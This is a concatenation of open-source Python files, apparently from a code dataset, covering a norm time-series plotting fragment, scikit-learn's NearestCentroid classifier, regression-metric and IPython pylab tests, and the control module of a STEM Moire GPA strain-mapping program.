mydir=plotbasedir + '/time_independent_plots/' + '/' + pertstr + '/'
# NOTE(review): `mybv` and `mydir` are only needed by the commented-out
# plot_norm_timeseries call below -- confirm before removing.

#Plot norm time series.
#bvf.plot_norm_timeseries(norm_mean_o,norm_mean_i,norm_mean_r,plotvars,reg_name,mydir,mybv,'norm_mean',figsize='None')

plot_reg_name = True
figsize=bvf.default_figure_size
figextension='.png'

#Create output directory
if not os.path.exists(plotbasedir):
    os.makedirs(plotbasedir)

#Create time series.
# Two entries per time step: even index = analysis norm at t, odd index =
# first-guess norm at t+1, which draws the usual analysis/forecast sawtooth.
time_serie=np.nan*np.zeros([ntimes*2,npert,nregs])
times=np.nan*np.zeros(ntimes*2)

for myvar in plotvars :
    for ii in range(0,ntimes-1) :
        for ipert in range(inipert,endpert+1) :
            # Sawtooth-style series representing the evolution of the norm.
            time_serie[2*ii,ipert-1,:]=norm_mean_anal[myvar][ii,ipert-1,:]
            time_serie[2*ii+1,ipert-1,:]=norm_mean_gues[myvar][ii+1,ipert-1,:]
            times[2*ii]=ii
            times[2*ii+1]=ii+1
    for ireg in range(0,nregs) :
        iregstr="%04d" % ( ireg + 1 )
        fig=plt.figure(1,figsize=figsize)
        for ipert in range(inipert,endpert+1) :
            plt.plot(times,time_serie[:,ipert-1,ireg],'-')
        plt.ylabel('Norm')
        plt.xlabel('Time')
        #if debug == True :
        plt.show()
        # NOTE(review): "Generationg" is a typo in the runtime message below;
        # left untouched here because this edit only changes comments.
        print( 'Generationg the following figure : ' + 'Figure_' + '_pertamptimeserie_' + myvar + 'reg' + iregstr + figextension )
        plt.savefig( plotbasedir + 'Figure_' + '_pertamptimeserie_' + myvar + 'reg' + iregstr + figextension )
        plt.close(fig)
| gpl-3.0 |
glennq/scikit-learn | sklearn/neighbors/nearest_centroid.py | 37 | 7348 | # -*- coding: utf-8 -*-
"""
Nearest Centroid Classification
"""
# Author: Robert Layton <robertlayton@gmail.com>
# Olivier Grisel <olivier.grisel@ensta.org>
#
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import sparse as sp
from ..base import BaseEstimator, ClassifierMixin
from ..metrics.pairwise import pairwise_distances
from ..preprocessing import LabelEncoder
from ..utils.validation import check_array, check_X_y, check_is_fitted
from ..utils.sparsefuncs import csc_median_axis_0
from ..utils.multiclass import check_classification_targets
class NearestCentroid(BaseEstimator, ClassifierMixin):
    """Nearest centroid classifier.

    Each class is represented by its centroid, with test samples classified to
    the class with the nearest centroid.

    Read more in the :ref:`User Guide <nearest_centroid_classifier>`.

    Parameters
    ----------
    metric : string, or callable
        The metric to use when calculating distance between instances in a
        feature array. If metric is a string or callable, it must be one of
        the options allowed by metrics.pairwise.pairwise_distances for its
        metric parameter.
        The centroids for the samples corresponding to each class is the point
        from which the sum of the distances (according to the metric) of all
        samples that belong to that particular class are minimized.
        If the "manhattan" metric is provided, this centroid is the median and
        for all other metrics, the centroid is now set to be the mean.

    shrink_threshold : float, optional (default = None)
        Threshold for shrinking centroids to remove features.

    Attributes
    ----------
    centroids_ : array-like, shape = [n_classes, n_features]
        Centroid of each class

    Examples
    --------
    >>> from sklearn.neighbors.nearest_centroid import NearestCentroid
    >>> import numpy as np
    >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    >>> y = np.array([1, 1, 1, 2, 2, 2])
    >>> clf = NearestCentroid()
    >>> clf.fit(X, y)
    NearestCentroid(metric='euclidean', shrink_threshold=None)
    >>> print(clf.predict([[-0.8, -1]]))
    [1]

    See also
    --------
    sklearn.neighbors.KNeighborsClassifier: nearest neighbors classifier

    Notes
    -----
    When used for text classification with tf-idf vectors, this classifier is
    also known as the Rocchio classifier.

    References
    ----------
    Tibshirani, R., Hastie, T., Narasimhan, B., & Chu, G. (2002). Diagnosis of
    multiple cancer types by shrunken centroids of gene expression. Proceedings
    of the National Academy of Sciences of the United States of America,
    99(10), 6567-6572. The National Academy of Sciences.

    """

    def __init__(self, metric='euclidean', shrink_threshold=None):
        self.metric = metric
        self.shrink_threshold = shrink_threshold

    def fit(self, X, y):
        """
        Fit the NearestCentroid model according to the given training data.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = [n_samples, n_features]
            Training vector, where n_samples in the number of samples and
            n_features is the number of features.
            Note that centroid shrinking cannot be used with sparse matrices.
        y : array, shape = [n_samples]
            Target values (integers)
        """
        # If X is sparse and the metric is "manhattan", store it in a csc
        # format: it is easier to calculate the median that way.
        if self.metric == 'manhattan':
            X, y = check_X_y(X, y, ['csc'])
        else:
            X, y = check_X_y(X, y, ['csr', 'csc'])
        is_X_sparse = sp.issparse(X)
        if is_X_sparse and self.shrink_threshold:
            raise ValueError("threshold shrinking not supported"
                             " for sparse input")
        check_classification_targets(y)

        n_samples, n_features = X.shape
        le = LabelEncoder()
        y_ind = le.fit_transform(y)
        self.classes_ = classes = le.classes_
        n_classes = classes.size
        if n_classes < 2:
            raise ValueError('y has less than 2 classes')

        # One centroid row per class.
        self.centroids_ = np.empty((n_classes, n_features), dtype=np.float64)
        # Number of samples in each class (used by the shrinkage formula).
        nk = np.zeros(n_classes)

        for cur_class in range(n_classes):
            # Boolean mask selecting the members of the current class.
            center_mask = y_ind == cur_class
            nk[cur_class] = np.sum(center_mask)
            if is_X_sparse:
                # Sparse matrices need integer indices rather than a boolean mask.
                center_mask = np.where(center_mask)[0]

            # XXX: Update other averaging methods according to the metrics.
            if self.metric == "manhattan":
                # NumPy does not calculate median of sparse matrices.
                if not is_X_sparse:
                    self.centroids_[cur_class] = np.median(X[center_mask], axis=0)
                else:
                    self.centroids_[cur_class] = csc_median_axis_0(X[center_mask])
            else:
                if self.metric != 'euclidean':
                    warnings.warn("Averaging for metrics other than "
                                  "euclidean and manhattan not supported. "
                                  "The average is set to be the mean."
                                  )
                self.centroids_[cur_class] = X[center_mask].mean(axis=0)

        if self.shrink_threshold:
            # Shrunken-centroid adjustment (Tibshirani et al. 2002).
            dataset_centroid_ = np.mean(X, axis=0)

            # m parameter for determining deviation
            m = np.sqrt((1. / nk) + (1. / n_samples))
            # Calculate deviation using the standard deviation of centroids.
            variance = (X - self.centroids_[y_ind]) ** 2
            variance = variance.sum(axis=0)
            s = np.sqrt(variance / (n_samples - n_classes))
            s += np.median(s)  # To deter outliers from affecting the results.
            mm = m.reshape(len(m), 1)  # Reshape to allow broadcasting.
            ms = mm * s
            deviation = ((self.centroids_ - dataset_centroid_) / ms)
            # Soft thresholding: if the deviation crosses 0 during shrinking,
            # it becomes zero.
            signs = np.sign(deviation)
            deviation = (np.abs(deviation) - self.shrink_threshold)
            deviation[deviation < 0] = 0
            deviation *= signs
            # Now adjust the centroids using the deviation
            msd = ms * deviation
            self.centroids_ = dataset_centroid_[np.newaxis, :] + msd
        return self

    def predict(self, X):
        """Perform classification on an array of test vectors X.

        The predicted class C for each sample in X is returned.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]

        Returns
        -------
        C : array, shape = [n_samples]

        Notes
        -----
        If the metric constructor parameter is "precomputed", X is assumed to
        be the distance matrix between the data to be predicted and
        ``self.centroids_``.
        """
        check_is_fitted(self, 'centroids_')

        X = check_array(X, accept_sparse='csr')
        # Assign each sample to the class whose centroid is closest.
        return self.classes_[pairwise_distances(
            X, self.centroids_, metric=self.metric).argmin(axis=1)]
| bsd-3-clause |
djgagne/scikit-learn | sklearn/metrics/tests/test_regression.py | 272 | 6066 | from __future__ import division, print_function
import numpy as np
from itertools import product
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.metrics import explained_variance_score
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
from sklearn.metrics import median_absolute_error
from sklearn.metrics import r2_score
from sklearn.metrics.regression import _check_reg_targets
def test_regression_metrics(n_samples=50):
    """Check the basic regression metrics on predictions uniformly off by one."""
    targets = np.arange(n_samples)
    shifted = targets + 1

    # A constant error of 1 makes MSE, MAE and MedAE all exactly 1.
    for error_metric in (mean_squared_error,
                         mean_absolute_error,
                         median_absolute_error):
        assert_almost_equal(error_metric(targets, shifted), 1.)

    assert_almost_equal(r2_score(targets, shifted), 0.995, 2)
    assert_almost_equal(explained_variance_score(targets, shifted), 1.)
def test_multioutput_regression():
    # 3 samples, 4 binary outputs; scores are averaged across the outputs.
    y_true = np.array([[1, 0, 0, 1], [0, 1, 1, 1], [1, 1, 0, 1]])
    y_pred = np.array([[0, 0, 0, 1], [1, 0, 1, 1], [0, 0, 0, 1]])

    # Per-output MSEs are 1/3, 2/3, 2/3 and 0, averaged over 4 outputs.
    error = mean_squared_error(y_true, y_pred)
    assert_almost_equal(error, (1. / 3 + 2. / 3 + 2. / 3) / 4.)

    # mean_absolute_error and mean_squared_error are equal because
    # it is a binary problem.
    error = mean_absolute_error(y_true, y_pred)
    assert_almost_equal(error, (1. / 3 + 2. / 3 + 2. / 3) / 4.)

    # r2_score averaging: weighted by each output's variance vs. uniform.
    error = r2_score(y_true, y_pred, multioutput='variance_weighted')
    assert_almost_equal(error, 1. - 5. / 2)
    error = r2_score(y_true, y_pred, multioutput='uniform_average')
    assert_almost_equal(error, -.875)
def test_regression_metrics_at_limits():
    """Degenerate inputs: a single perfectly-predicted sample and a perfect fit."""
    single = [0.]

    # An exact single-sample match yields zero error for every error metric.
    for error_metric in (mean_squared_error,
                         mean_absolute_error,
                         median_absolute_error):
        assert_almost_equal(error_metric(single, single), 0.00, 2)

    # Perfect predictions score 1 for the variance-based metrics.
    assert_almost_equal(explained_variance_score(single, single), 1.00, 2)
    assert_almost_equal(r2_score([0., 1], [0., 1]), 1.00, 2)
def test__check_reg_targets():
    # All of length 3
    EXAMPLES = [
        ("continuous", [1, 2, 3], 1),
        ("continuous", [[1], [2], [3]], 1),
        ("continuous-multioutput", [[1, 1], [2, 2], [3, 1]], 2),
        ("continuous-multioutput", [[5, 1], [4, 2], [3, 1]], 2),
        ("continuous-multioutput", [[1, 3, 4], [2, 2, 2], [3, 1, 1]], 3),
    ]

    # Every ordered pair of examples: pairs with matching type and output
    # count must validate; mismatched pairs must raise ValueError.
    for (type1, y1, n_out1), (type2, y2, n_out2) in product(EXAMPLES,
                                                            repeat=2):

        if type1 == type2 and n_out1 == n_out2:
            y_type, y_check1, y_check2, multioutput = _check_reg_targets(
                y1, y2, None)
            assert_equal(type1, y_type)
            if type1 == 'continuous':
                # 1d input is reshaped to a single-output column vector.
                assert_array_equal(y_check1, np.reshape(y1, (-1, 1)))
                assert_array_equal(y_check2, np.reshape(y2, (-1, 1)))
            else:
                assert_array_equal(y_check1, y1)
                assert_array_equal(y_check2, y2)
        else:
            assert_raises(ValueError, _check_reg_targets, y1, y2, None)
def test_regression_multioutput_array():
    """With multioutput='raw_values' the regression metrics must return one
    score per output column, and 'uniform_average' must equal the plain mean
    of those raw per-output scores."""
    y_true = [[1, 2], [2.5, -1], [4.5, 3], [5, 7]]
    y_pred = [[1, 1], [2, -1], [5, 4], [5, 6.5]]

    mse = mean_squared_error(y_true, y_pred, multioutput='raw_values')
    mae = mean_absolute_error(y_true, y_pred, multioutput='raw_values')
    r = r2_score(y_true, y_pred, multioutput='raw_values')
    evs = explained_variance_score(y_true, y_pred, multioutput='raw_values')
    assert_array_almost_equal(mse, [0.125, 0.5625], decimal=2)
    assert_array_almost_equal(mae, [0.25, 0.625], decimal=2)
    assert_array_almost_equal(r, [0.95, 0.93], decimal=2)
    assert_array_almost_equal(evs, [0.95, 0.93], decimal=2)

    # mean_absolute_error and mean_squared_error are equal because
    # it is a binary problem.
    y_true = [[0, 0]]*4
    y_pred = [[1, 1]]*4
    mse = mean_squared_error(y_true, y_pred, multioutput='raw_values')
    mae = mean_absolute_error(y_true, y_pred, multioutput='raw_values')
    r = r2_score(y_true, y_pred, multioutput='raw_values')
    assert_array_almost_equal(mse, [1., 1.], decimal=2)
    assert_array_almost_equal(mae, [1., 1.], decimal=2)
    assert_array_almost_equal(r, [0., 0.], decimal=2)

    # 'uniform_average' must agree with np.mean of the raw per-output scores.
    r = r2_score([[0, -1], [0, 1]], [[2, 2], [1, 1]], multioutput='raw_values')
    assert_array_almost_equal(r, [0, -3.5], decimal=2)
    assert_equal(np.mean(r), r2_score([[0, -1], [0, 1]], [[2, 2], [1, 1]],
                                      multioutput='uniform_average'))
    evs = explained_variance_score([[0, -1], [0, 1]], [[2, 2], [1, 1]],
                                   multioutput='raw_values')
    assert_array_almost_equal(evs, [0, -1.25], decimal=2)

    # Checking for the condition in which both numerator and denominator is
    # zero.
    y_true = [[1, 3], [-1, 2]]
    y_pred = [[1, 4], [-1, 1]]
    r2 = r2_score(y_true, y_pred, multioutput='raw_values')
    assert_array_almost_equal(r2, [1., -3.], decimal=2)
    assert_equal(np.mean(r2), r2_score(y_true, y_pred,
                                       multioutput='uniform_average'))
    evs = explained_variance_score(y_true, y_pred, multioutput='raw_values')
    assert_array_almost_equal(evs, [1., -3.], decimal=2)
    assert_equal(np.mean(evs), explained_variance_score(y_true, y_pred))
def test_regression_custom_weights():
    """Regression metrics must honour an explicit per-output weight vector."""
    truth = [[1, 2], [2.5, -1], [4.5, 3], [5, 7]]
    guess = [[1, 1], [2, -1], [5, 4], [5, 6.5]]
    weights = [0.4, 0.6]

    assert_almost_equal(
        mean_squared_error(truth, guess, multioutput=weights),
        0.39, decimal=2)
    assert_almost_equal(
        mean_absolute_error(truth, guess, multioutput=weights),
        0.475, decimal=3)
    assert_almost_equal(
        r2_score(truth, guess, multioutput=weights),
        0.94, decimal=2)
    assert_almost_equal(
        explained_variance_score(truth, guess, multioutput=weights),
        0.94, decimal=2)
| bsd-3-clause |
noslenfa/tdjangorest | uw/lib/python2.7/site-packages/IPython/core/tests/test_pylabtools.py | 2 | 4546 | """Tests for pylab tools module.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2011, the IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
# Stdlib imports
# Third-party imports
import matplotlib; matplotlib.use('Agg')
import nose.tools as nt
from matplotlib import pyplot as plt
import numpy as np
# Our own imports
from IPython.core.interactiveshell import InteractiveShell
from IPython.testing import decorators as dec
from .. import pylabtools as pt
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Local utilities
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
@dec.parametric
def test_figure_to_svg():
    """print_figure should return None for an empty figure and an
    SVG document for a non-empty one.

    NOTE(review): this is a legacy nose yield-style parametric test;
    each ``yield`` is one checked sub-case.
    """
    # simple empty-figure test
    fig = plt.figure()
    yield nt.assert_equal(pt.print_figure(fig, 'svg'), None)

    plt.close('all')

    # simple check for at least svg-looking output
    fig = plt.figure()
    ax = fig.add_subplot(1,1,1)
    ax.plot([1,2,3])
    plt.draw()
    # Only the start of the payload is inspected, case-insensitively.
    svg = pt.print_figure(fig, 'svg')[:100].lower()
    yield nt.assert_true('doctype svg' in svg)
def test_import_pylab():
    """import_pylab should expose the standard shortcuts ('plt', 'np') in
    the supplied namespace even without a wildcard import."""
    ip = get_ipython()
    namespace = {}
    pt.import_pylab(namespace, import_all=False)
    nt.assert_true('plt' in namespace)
    nt.assert_equal(namespace['np'], np)
class TestPylabSwitch(object):
    """Exercise InteractiveShell.enable_matplotlib GUI-selection logic with
    matplotlib state and pylabtools hooks stubbed out in setup/teardown."""

    class Shell(InteractiveShell):
        def enable_gui(self, gui):
            # Stub: the real implementation would start a GUI event loop.
            pass

    def setup(self):
        import matplotlib
        def act_mpl(backend):
            # Record the requested backend instead of really activating it.
            matplotlib.rcParams['backend'] = backend

        # Save rcParams since they get modified
        self._saved_rcParams = matplotlib.rcParams
        matplotlib.rcParams = dict(backend='Qt4Agg')

        # Mock out functions
        self._save_am = pt.activate_matplotlib
        pt.activate_matplotlib = act_mpl
        self._save_ip = pt.import_pylab
        pt.import_pylab = lambda *a,**kw:None
        self._save_cis = pt.configure_inline_support
        pt.configure_inline_support = lambda *a,**kw:None

    def teardown(self):
        # Restore the patched pylabtools functions and the saved rcParams.
        pt.activate_matplotlib = self._save_am
        pt.import_pylab = self._save_ip
        pt.configure_inline_support = self._save_cis
        import matplotlib
        matplotlib.rcParams = self._saved_rcParams

    def test_qt(self):
        """Once a real GUI ('qt') is selected, 'inline' does not unseat it."""
        s = self.Shell()
        gui, backend = s.enable_matplotlib(None)
        nt.assert_equal(gui, 'qt')
        nt.assert_equal(s.pylab_gui_select, 'qt')

        gui, backend = s.enable_matplotlib('inline')
        nt.assert_equal(gui, 'inline')
        nt.assert_equal(s.pylab_gui_select, 'qt')

        gui, backend = s.enable_matplotlib('qt')
        nt.assert_equal(gui, 'qt')
        nt.assert_equal(s.pylab_gui_select, 'qt')

        gui, backend = s.enable_matplotlib('inline')
        nt.assert_equal(gui, 'inline')
        nt.assert_equal(s.pylab_gui_select, 'qt')

        # No argument falls back to the remembered GUI selection.
        gui, backend = s.enable_matplotlib()
        nt.assert_equal(gui, 'qt')
        nt.assert_equal(s.pylab_gui_select, 'qt')

    def test_inline(self):
        """'inline' alone selects no GUI; a later 'qt' request wins."""
        s = self.Shell()
        gui, backend = s.enable_matplotlib('inline')
        nt.assert_equal(gui, 'inline')
        nt.assert_equal(s.pylab_gui_select, None)

        gui, backend = s.enable_matplotlib('inline')
        nt.assert_equal(gui, 'inline')
        nt.assert_equal(s.pylab_gui_select, None)

        gui, backend = s.enable_matplotlib('qt')
        nt.assert_equal(gui, 'qt')
        nt.assert_equal(s.pylab_gui_select, 'qt')

    def test_qt_gtk(self):
        """Requesting a second, different GUI keeps the first selection."""
        s = self.Shell()
        gui, backend = s.enable_matplotlib('qt')
        nt.assert_equal(gui, 'qt')
        nt.assert_equal(s.pylab_gui_select, 'qt')

        gui, backend = s.enable_matplotlib('gtk')
        nt.assert_equal(gui, 'qt')
        nt.assert_equal(s.pylab_gui_select, 'qt')
| apache-2.0 |
slimpotatoes/STEM_Moire_GPA | src/main.py | 1 | 4692 | # ############################# #
# #
# STEM Moire GPA Software #
# #
# ############################# #
#
# #####################################################################################
#
# Python script calculating the 2D relative strain maps from a STEM Moire hologram.
# Alexandre POFELSKI <pofelska@mcmaster.ca>
# https://github.com/slimpotatoes/STEM_Moire_GPA
# 18/06/2019
#
# ###########################################
# STEM Moire GPA control Module
import matplotlib.pyplot as plt
import gui as gui
import data as data
import userinput as userinput
import smhsimulation as smhsimu
import gpa as gpa
import unstrainref as uref
import conversion as conversion
import straincalc as strain
import rotatecalc as rotate
def main():
    """Connection of the different events (button clicked by user) with the process steps of
    STEM Moire GPA processing"""
    def flow_input(event):
        """Input Process
        1. Call the GUI to create an open file dialog for the user to input files.
        2. Verify and import files in smgdata.
        3. Display the SMH and ICref images to the user."""
        # Guard: only react when the click landed on the "input" button axis.
        if not event.inaxes == smggui.event_input.ax:
            raise Exception('Improper input axis')
        file_path_smh, file_path_ic = smggui.open_files()
        userinput.load_files(file_path_smh, file_path_ic, smgdata)
        smggui.guismhexp(smgdata)

    def flow_smhsim(event):
        """Simulation of the STEM Moire hologram Process
        1. Call smh_sim function in smhsimulation module to simulate the STEM Moire hologram from ICref and store
        the results in smgdata.
        2. Display the results of the simulation to the user using guismhsim window."""
        if not event.inaxes == smggui.event_smhsim.ax:
            raise Exception('Improper shmsim axis')
        smhsimu.smh_sim(smgdata)
        smggui.guismhsim(smgdata)

    def flow_gpa(event):
        """Geometrical Phase Analysis Process
        1. Collect the mask selected by the user on the guismhsim window.
        2. Perform the GPA calculation on the selected mask and store the results in smgdata.
        3. Display the GPA result (phase image) to the user using guiphase window."""
        if not event.inaxes == smggui.event_gpa.ax:
            raise Exception('Improper gpa axis')
        mask_selected = smggui.mask_selection()
        gpa.gpa(mask_selected, smgdata)
        smggui.guiphase(mask_selected, smgdata)

    def flow_ref(event):
        """Unstrained reference definition Process. On the two phase images calculated by GPA,
        1. Call the update_zerostrain function in unstrainref module to update the unstrain reference on the
        phase image and store the results in smgdata.
        2. Display the updated phase image with the new unstrained reference on the guiphase window."""
        if not event.inaxes == smggui.event_ref.ax:
            raise Exception('Improper ref axis')
        # Both GPA masks share the same unstrained-reference update.
        for mask_id in ['Mask1', 'Mask2']:
            uref.update_zerostrain(mask_id, smgdata)
            smggui.update_phase(mask_id, smgdata)

    def flow_convert(event):
        """Moire to crystal data conversion Process. Call the conversion function in the conversion module for both
        masks."""
        if not event.inaxes == smggui.event_convert.ax:
            raise Exception('Improper convert axis')
        # NOTE(review): looks like leftover debug output — consider logging.
        print(smggui.h_1, smggui.h_2, smggui.v_1, smggui.v_2)
        conversion.conversion('Mask1', smggui.h_1, smggui.v_1, smgdata)
        conversion.conversion('Mask2', smggui.h_2, smggui.v_2, smgdata)

    def flow_strain(event):
        """Strain tensor calculation from two non collinear crystalline wave vector Process"""
        if not event.inaxes == smggui.event_strain.ax:
            raise Exception('Improper strain axis')
        strain.strain_calculation('Mask1', 'Mask2', smgdata)
        rotate.rotate_tensor(smgdata, smggui)
        smggui.guistrain(smgdata)

    """Creation of the GUI and the Data object"""
    smgdata = data.SMGData()
    smggui = gui.SMGGUI(smgdata)
    """Call of the GUI module functions to pop up the initial windows for the user"""
    smggui.guiconv()
    smggui.guiflow()
    """Connection of the event "button clicked by the user" to a function"""
    smggui.event_input.on_clicked(flow_input)
    smggui.event_smhsim.on_clicked(flow_smhsim)
    smggui.event_gpa.on_clicked(flow_gpa)
    smggui.event_ref.on_clicked(flow_ref)
    smggui.event_convert.on_clicked(flow_convert)
    smggui.event_strain.on_clicked(flow_strain)
    # Hand control to the matplotlib event loop; blocks until windows close.
    plt.show()
# Run the application only when executed directly as a script.
if __name__ == "__main__":
    main()
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.